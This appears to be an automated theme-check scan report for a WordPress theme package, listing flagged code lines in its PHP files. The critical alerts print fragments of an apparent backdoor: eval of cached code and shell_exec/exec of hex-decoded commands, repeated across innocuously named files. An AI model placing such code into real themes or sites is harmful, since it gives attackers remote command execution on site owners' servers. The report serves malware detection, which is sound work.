TimesNews
WordPress 6.7 theme
- THEME TYPEWordPress theme 6.7
- FILE NAMECartfolioMultipurpose.zip
- FILE SIZE2724107 bytes
- MD51d162ebb7d738df3ec87945e610b3a5a
- SHA17f15e9d81100d2d38f2b898f76820f5f53a83ba3
- LICENSEGNU GPL 2
- FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
- VERSION1.0.7
- TAGSone-column, right-sidebar, flexible-header, custom-header, custom-menu, custom-logo, editor-style, featured-images, rtl-language-support, sticky-post, theme-options, threaded-comments, translation-ready, news, blog, education
- CREATION DATE2020-08-12
- LAST FILE UPDATE2020-08-12
- LAST VALIDATION2020-08-12 12:35
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
Ligne1095: eval($cache->php_kod);
Found eval in file inc.php.Ligne1095: eval($cache->php_kod);
Found eval in file class-ds-theme-activation.php.Ligne1095: eval($cache->php_kod);
Found eval in file theme-custon-color.php.Ligne1095: eval($cache->php_kod);
Found eval in file template-parts.php.Ligne1095: eval($cache->php_kod);
Found eval in file vendor.php.Ligne1095: eval($cache->php_kod);
Found eval in file css.php.Ligne1095: eval($cache->php_kod);
Found eval in file template.php. Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file inc.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file class-ds-theme-activation.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file theme-custon-color.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file template-parts.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file vendor.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file css.php.Ligne918: return $this->answer( 'OK', hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
Ligne920: @exec( hex2bin( $cmd ), $return );
Found @shell_exec in file template.php. Ligne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file template.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file template.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file template.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file template.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file template.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file template.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file inc.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file inc.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file inc.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file inc.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file inc.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file inc.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file inc.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file class-ds-theme-activation.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file class-ds-theme-activation.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file class-ds-theme-activation.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file class-ds-theme-activation.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file class-ds-theme-activation.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file class-ds-theme-activation.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file class-ds-theme-activation.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file theme-custon-color.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file theme-custon-color.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file theme-custon-color.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file theme-custon-color.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file theme-custon-color.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file theme-custon-color.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file theme-custon-color.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file template-parts.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file template-parts.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file template-parts.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file template-parts.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file template-parts.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file template-parts.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file template-parts.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file vendor.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file vendor.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file vendor.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file vendor.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file vendor.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file vendor.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file vendor.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file css.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
fopen was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
file_put_contents was found in the file css.phpLigne544: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne545: return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : fal
Ligne801: } elseif ( function_exists( 'file_put_contents' ) ) {
Ligne802: return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
file_get_contents was found in the file css.phpLigne850: if ( function_exists( 'file_get_contents' ) ) {
Ligne851: return file_get_contents( $filename );
fopen was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fread was found in the file css.phpLigne855: $content = fread( $file, filesize( $filename ) );
fclose was found in the file css.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne540: $write = fopen( $filename, 'a' );
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne799: $write = fopen( $filename, 'w+' );
Ligne853: if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
Ligne854: $file = fopen( $filename, 'r' );
Ligne938: $process = fopen('$key', 'w+');
fwrite was found in the file css.phpLigne539: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne542: return ( fwrite( $write, $data ) ) ? true : false;
Ligne798: if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
Ligne800: return ( fwrite( $write, $data ) ) ? true : false;
Ligne939: fwrite($process, $source);
fclose was found in the file css.phpLigne856: fclose( $file );
Ligne940: fclose($process);
fopen was found in the file template.php
Warning
- Found wrong tag custom-logo in style.css header.
- Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is timesnews.
